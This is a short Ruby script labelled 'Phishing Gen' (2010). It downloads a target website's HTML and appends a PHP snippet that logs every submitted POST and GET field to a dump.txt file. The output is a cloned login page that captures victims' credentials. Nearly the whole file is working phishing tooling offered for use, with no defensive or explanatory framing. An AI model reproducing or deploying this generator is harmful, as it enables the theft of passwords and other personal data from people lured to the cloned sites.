#!usr/bin/ruby #PHishing Gen (C) Doddy Hackman 2010 #contact me : doddy-hackman.blogspot.com require 'net/http' def uso print "\n[+] fake.rb <site> <result>\n" end def toma(web) return Net::HTTP.get(web) end def savefile(filename,text) files = File.open(filename,'a') files.puts text end def gen(web,file,magic) print "\n\n[+] Getting the source...\n" begin code = toma(URI.parse(web)) savefile(file,code+"\n"+magic) print "[+] Finish" copyright() end end def head() print "\n\n -- == Phising Gen == --\n\n" end def copyright() print "\n\n\n(C) Doddy Hackman 2010\n\n" exit(1) end head() if !ARGV[0] and !ARGV[1] uso() else text ='<?php $file = fopen("dump.txt", "a");foreach($_POST as $uno => $dos) {fwrite($file, $uno."=".$dos."\r\n");}foreach($_GET as $tres => $cuatro) {fwrite($file, $tres."=".$cuatro."\r\n");}fclose($file);?>' gen(ARGV[0],ARGV[1],text) end copyright()